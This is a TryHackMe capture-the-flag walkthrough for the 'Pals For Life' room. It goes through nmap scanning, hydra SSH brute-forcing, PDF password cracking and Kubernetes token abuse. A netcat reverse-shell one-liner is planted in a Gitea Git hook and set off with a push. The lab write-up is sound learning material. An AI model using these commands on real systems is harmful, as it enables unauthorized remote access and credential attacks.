Pals For Life THM Walkthrough

Target IP : 10.10.145.55

scanning the IP

nmap 10.10.145.55 -p- — min-rate 1000 -vv -sCV

This might fill UP your screen with a very big output. But it will open up a lot of attacking vectors for you.

let’s look at the open ports :
22,6443,10250,30180,31111,31112

I started bruteforcing the ssh services just in case if they work, there is a very slight chance but i like to try every entrance i could get.

hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 10.10.145.55 ssh 31112

hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 10.10.145.55 ssh 22

After a little enumeration i opened port 31111, i guess this is the web tool which is mention in the hint of flag1.

after further exploration in the site i came across a user named leeroy which can be a potential ssh user on the device. whenever you come across a web application, i would recommend spend some time on it understand how it’s working explore every possible thing u can do. It will greatly help you to find if there is something you can use to your advantage.

i tried adding new repositories in Gittea but it didn’t work as i wanted so let’s move on to different ports.

while adding repository i stumbled upon “team.thm”

as u can see in the code given

so lets add that to the /etc/hosts.

Okay now as we know port 30180 is running nginx. So, let’s try gobuster on that and see if we can find any directory.

It did took some time, but i solved my cube in between.

got this when reached the page.

there was nothing much on the webpage so i thought of checking the page source here and i found uninteresting_file.pdf.

which seemed like a base64 code, so i passed it through cyberchef. and copied the content in a created file, named uninterested_file.pdf on my system.

after that i tried to run pdf2john.pl but it kept showing me error, i tried to resolve it but then i copied the code of pdf2john.py and it ran fine in first time only.

link to pdf2john.py

unlocking the pdf with this password we find a new password in the pdf which looks like the password for the user we found earlier.

YEPP! we were right !

Now looking the repository we come across a already made webhook, which by updating we can see the secret flag.

Hint : update and use show password to see the flag.

Let’s move on with the room and put rev shell code in post Git Hook.

rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacking ip> <port>>/tmp/f

now we have to make a push in the repo, as i tried to do from my registered id but it didn’t work so let’s do that here.

git clone http://team.thm:31111/leeroy/jenkins.git

touch web_head

git add web_head

git commit -m “webby_007”

git push origin master

While u use these codes have a nc listener running in the background.

Git Push made to trigger the rev shell command to run .

netcat listener got rev shell

After a little exploration we found the 2nd flag.

In the hint of Flag 3 we have kubectl. With this info i knew i had to find kubernetes so i tried using the find command.

i found how to exploit kubernetes, luckily i found this medium blog.

take the token and save it as token.txt on attacking machine.

tried decoding it to see if i can get something.

we have service account here.

use basic kubectl command to enumerate and see if you can find anything.

i recommend Insekube room on tryhackme to understand this step clearly.

FLag 3 is here!!

Now to get the root flag, we will search the node and see if we can find any image. Once we have the image we can make a host.yaml file and put our code to give us a bash shell. and then configure it and run it to get the final root shell.

This porcess was confusing for me, i had to take a little help on this one.

And that’s how you have the final ROOT of the medium difficulty ROOM.

HAPPY HACKING 🥳🥳

LINK TREE: https://linktr.ee/RishabhRai